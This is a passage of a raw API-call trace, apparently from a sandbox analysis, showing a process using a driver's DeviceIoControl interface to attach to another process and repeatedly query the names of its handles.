PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.556] ObReferenceObjectByHandle (in: Handle=0x5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800376fb90, HandleInformation=0x0) returned 0x0 [0244.556] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.556] PsReleaseProcessExitSynchronization () returned 0x2 [0244.556] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.557] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.557] ObfDereferenceObject (Object=0xfffffa800376fb90) returned 0x1 [0244.557] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.557] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.557] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.557] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xda, lpOverlapped=0x0) returned 1 [0244.557] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.557] PsAcquireProcessExitSynchronization () returned 0x0 [0244.557] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.557] ObReferenceObjectByHandle (in: Handle=0xcc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800256a710, HandleInformation=0x0) returned 0x0 [0244.557] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.557] PsReleaseProcessExitSynchronization () returned 0x2 [0244.557] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.557] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312d044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800312d044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.557] ObfDereferenceObject (Object=0xfffffa800256a710) returned 0x12 [0244.557] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.557] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.557] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.557] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3e, lpOverlapped=0x0) returned 1 [0244.557] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.557] PsAcquireProcessExitSynchronization () returned 0x0 [0244.557] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.557] ObReferenceObjectByHandle (in: Handle=0x124, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800378d950, HandleInformation=0x0) returned 0x0 [0244.557] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.557] PsReleaseProcessExitSynchronization () returned 0x2 [0244.557] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.557] ObQueryNameString (in: Object=0xfffffa800378d950, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.557] ObfDereferenceObject (Object=0xfffffa800378d950) returned 0x2 [0244.558] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.558] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.558] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.558] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3e, lpOverlapped=0x0) returned 1 [0244.558] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.558] PsAcquireProcessExitSynchronization () returned 0x0 [0244.558] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.558] ObReferenceObjectByHandle (in: Handle=0x128, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800378dbf0, HandleInformation=0x0) returned 0x0 [0244.558] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.558] PsReleaseProcessExitSynchronization () returned 0x2 [0244.558] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.558] ObQueryNameString (in: Object=0xfffffa800378dbf0, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.558] ObfDereferenceObject (Object=0xfffffa800378dbf0) returned 0x1 [0244.558] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.558] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.558] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.558] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3e, lpOverlapped=0x0) returned 1 [0244.558] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.558] PsAcquireProcessExitSynchronization () returned 0x0 [0244.558] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.558] ObReferenceObjectByHandle (in: Handle=0x12c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800378ef20, HandleInformation=0x0) returned 0x0 [0244.558] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.558] PsReleaseProcessExitSynchronization () returned 0x2 [0244.558] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.558] ObQueryNameString (in: Object=0xfffffa800378ef20, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.558] ObfDereferenceObject (Object=0xfffffa800378ef20) returned 0x1 [0244.558] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.558] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.558] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.558] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xbc, lpOverlapped=0x0) returned 1 [0244.559] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.559] PsAcquireProcessExitSynchronization () returned 0x0 [0244.559] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.559] ObReferenceObjectByHandle (in: Handle=0x150, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003794c00, HandleInformation=0x0) returned 0x0 [0244.559] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.559] PsReleaseProcessExitSynchronization () returned 0x2 [0244.559] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.559] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.559] ObfDereferenceObject (Object=0xfffffa8003794c00) returned 0x1 [0244.559] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.559] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.559] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.559] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xbc, lpOverlapped=0x0) returned 1 [0244.559] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.559] PsAcquireProcessExitSynchronization () returned 0x0 [0244.559] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.559] ObReferenceObjectByHandle (in: Handle=0x154, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800379fdd0, HandleInformation=0x0) returned 0x0 [0244.559] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.559] PsReleaseProcessExitSynchronization () returned 0x2 [0244.559] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.559] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.559] ObfDereferenceObject (Object=0xfffffa800379fdd0) returned 0x1 [0244.559] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.559] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.559] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.559] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0244.559] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.559] PsAcquireProcessExitSynchronization () returned 0x0 [0244.559] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.559] ObReferenceObjectByHandle (in: Handle=0x15c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003270970, HandleInformation=0x0) returned 0x0 [0244.560] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.560] PsReleaseProcessExitSynchronization () returned 0x2 [0244.560] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.560] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.560] ObfDereferenceObject (Object=0xfffffa8003270970) returned 0x12 [0244.560] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.560] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.560] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.560] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0244.560] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.560] PsAcquireProcessExitSynchronization () returned 0x0 [0244.560] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.560] ObReferenceObjectByHandle (in: Handle=0x160, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036c5a20, HandleInformation=0x0) returned 0x0 [0244.565] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.565] PsReleaseProcessExitSynchronization () returned 0x2 [0244.565] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.566] ObQueryNameString (in: Object=0xfffffa80036c5a20, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.566] ObfDereferenceObject (Object=0xfffffa80036c5a20) returned 0x2 [0244.566] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.566] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.566] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.566] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0244.566] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.566] PsAcquireProcessExitSynchronization () returned 0x0 [0244.566] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.566] ObReferenceObjectByHandle (in: Handle=0x194, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800379ff20, HandleInformation=0x0) returned 0x0 [0244.566] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.566] PsReleaseProcessExitSynchronization () returned 0x2 [0244.566] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.566] ObQueryNameString (in: Object=0xfffffa800379ff20, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.566] ObfDereferenceObject (Object=0xfffffa800379ff20) returned 0x2 [0244.566] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.566] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.566] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.566] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0244.566] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.566] PsAcquireProcessExitSynchronization () returned 0x0 [0244.566] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.566] ObReferenceObjectByHandle (in: Handle=0x19c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800379a920, HandleInformation=0x0) returned 0x0 [0244.566] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.566] PsReleaseProcessExitSynchronization () returned 0x2 [0244.566] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.566] ObQueryNameString (in: Object=0xfffffa800379a920, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.567] ObfDereferenceObject (Object=0xfffffa800379a920) returned 0x2 [0244.567] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.567] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.567] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.567] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0244.567] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.567] PsAcquireProcessExitSynchronization () returned 0x0 [0244.567] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.567] ObReferenceObjectByHandle (in: Handle=0x1a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800380d9a0, HandleInformation=0x0) returned 0x0 [0244.567] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.567] PsReleaseProcessExitSynchronization () returned 0x2 [0244.567] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.567] ObQueryNameString (in: Object=0xfffffa800380d9a0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.567] ObfDereferenceObject (Object=0xfffffa800380d9a0) returned 0x2 [0244.567] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.567] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.567] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.567] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0244.567] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.567] PsAcquireProcessExitSynchronization () returned 0x0 [0244.567] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.567] ObReferenceObjectByHandle (in: Handle=0x1a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800380fe10, HandleInformation=0x0) returned 0x0 [0244.567] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.568] PsReleaseProcessExitSynchronization () returned 0x2 [0244.568] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.568] ObQueryNameString (in: Object=0xfffffa800380fe10, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.568] ObfDereferenceObject (Object=0xfffffa800380fe10) returned 0x2 [0244.568] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.568] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.568] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.568] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0244.568] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.568] PsAcquireProcessExitSynchronization () returned 0x0 [0244.568] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.568] ObReferenceObjectByHandle (in: Handle=0x1c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003815d20, HandleInformation=0x0) returned 0x0 [0244.568] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.568] PsReleaseProcessExitSynchronization () returned 0x2 [0244.568] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.568] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.568] ObfDereferenceObject (Object=0xfffffa8003815d20) returned 0x20 [0244.568] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.568] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.568] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.568] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0244.568] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.568] PsAcquireProcessExitSynchronization () returned 0x0 [0244.568] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.568] ObReferenceObjectByHandle (in: Handle=0x1c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003816ea0, HandleInformation=0x0) returned 0x0 [0244.569] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.569] PsReleaseProcessExitSynchronization () returned 0x2 [0244.569] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.569] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.569] ObfDereferenceObject (Object=0xfffffa8003816ea0) returned 0x12 [0244.569] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.569] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.569] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.569] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xa0, lpOverlapped=0x0) returned 1 [0244.569] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.569] PsAcquireProcessExitSynchronization () returned 0x0 [0244.569] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.569] ObReferenceObjectByHandle (in: Handle=0x1dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800381af20, HandleInformation=0x0) returned 0x0 [0244.569] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.569] 